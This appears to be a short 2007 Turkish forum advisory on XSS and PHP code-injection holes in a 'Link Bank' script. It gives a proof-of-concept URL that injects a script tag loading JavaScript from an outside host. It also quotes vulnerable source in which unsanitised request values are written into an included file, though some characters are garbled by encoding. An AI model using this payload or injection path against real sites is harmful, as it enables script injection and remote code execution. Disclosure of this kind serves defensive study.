link bank ta iframe.php dosyasýnda bulunan bir açýkla kullanýcý uzaktan xss ve php kodlarý çalýþtýrabiliyor.
xss için :
http://example.com/iframe.php?site=%...%3Cscript%20sr c=http://notlegal.ws/xss.js%3E%3C/script%3E
php için : (bunu bende tam çözemedim)
in ./content/index.txt:
14 <?php
15 include("links.txt");
16 ?>
in ./content/add_link.txt:
2 &l036;url_name = &l036;_REQUEST[&l039;url_name&l039;];
3 &l036;url = &l036;_REQUEST[&l039;url&l039;];
4 &l036;img = &l036;_REQUEST[&l039;img&l039;];
5 &l036;filename = "content/links.txt";
6 &l036;code = "<a href = iframe.php?site=&l036;url target=_blank>&l036;url_name</a><br>";
in ./iframe.php:
3 <title>Link Bank - <?php echo"&l036;site";?></title>
author(s): retard
email: retard (at) 30gigs (dot) com [email concealed]
Anasayfa 
Konu: Link Bank xss ve php kod çalıþtırma 
Ptsi Kas. 12, 2007 1:19 am
